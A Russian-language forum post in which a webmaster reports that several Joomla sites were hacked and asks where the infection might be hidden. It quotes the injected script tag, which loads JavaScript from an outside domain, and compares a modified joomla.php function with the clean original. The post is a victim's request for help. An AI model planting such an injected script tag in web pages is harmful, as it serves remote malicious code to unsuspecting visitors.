Взломали сайты на Джумле

У меня 10 сайтов на Джумле, 2 из которых на Джумле 1,0,15

На сервере стоит фаервол и доступ по фтп, ssh есть только с двух ip

Тем не менее сегодня на сайтах заметил такой код:

</body>
<script type="text/javascript" src="http://sell4game.ru/game.js"></script></html>

Методом тыка нашел что на сайте под Джумлой 1.0.15 был изменен файл /includes/joomla.php

но кусок вредоносного кода в нем я так и не нашел.

Сравнил файл на сервере и файл из архива с чистой Джумлой, они отличались небольшим кодом:

вот это было в нормальном файле

      function setPageTitle( $title=null ) {
                if (@$GLOBALS['mosConfig_pagetitles']) {
                        $title = trim( htmlspecialchars( $title ) );
			$title = stripslashes($title);
                        $this->_head['title'] = $title ? $GLOBALS['mosConfig_sitename'] . ' - '. $title : $GLOBALS['mosConfig_sitename'];
                }
        }

а это в измененном

        function setPageTitle( $title=null , $pageparams=null ) {
                if (@$GLOBALS['mosConfig_pagetitles']) {
            	$title = trim( strip_tags( $title ) );
            	$tseparator = @$GLOBALS['mosConfig_tseparator']? $GLOBALS['mosConfig_tseparator'] : ' - ';
                if ( $pageparams != null ) {
                    $pageownname = trim( htmlspecialchars( $pageparams->get('page_name') ) );
                    $this->_head['title'] = $pageparams->get('no_site_name') ? 
					( $pageownname ? $pageownname : ( $title ? $title : $GLOBALS['mosConfig_sitename'] )) : 
					( @$GLOBALS['mosConfig_pagetitles_first'] ? (( $pageownname ? $pageownname : $title ) . $tseparator . $GLOBALS['mosConfig_sitename']) : 
					( $GLOBALS['mosConfig_sitename']. $tseparator . ( $pageownname ? $pageownname : $title )));               
                 }
                 else {
                 $pageownname = null;
                        $this->_head['title'] = $title ? $title . $tseparator . $GLOBALS['mosConfig_sitename'] : $GLOBALS['mosConfig_sitename'];
                 }
                }
        }
 

Что тут криминального я так и не понял, но файл заменил и фрейм пропал.

На сайтах под Джумлой 1.5.22 тот же фрейм появляется не на всех страницах. Распаковка чистой Джумлы поверх файлов проблему не убрала. Код шаблона чистый вроде....

Поиск по слову sell4game или sell по всем файлам сайта ничего не дал, уже и мыслей нет где искать этот код.

Есть мысли у кого нить, где искать заразу?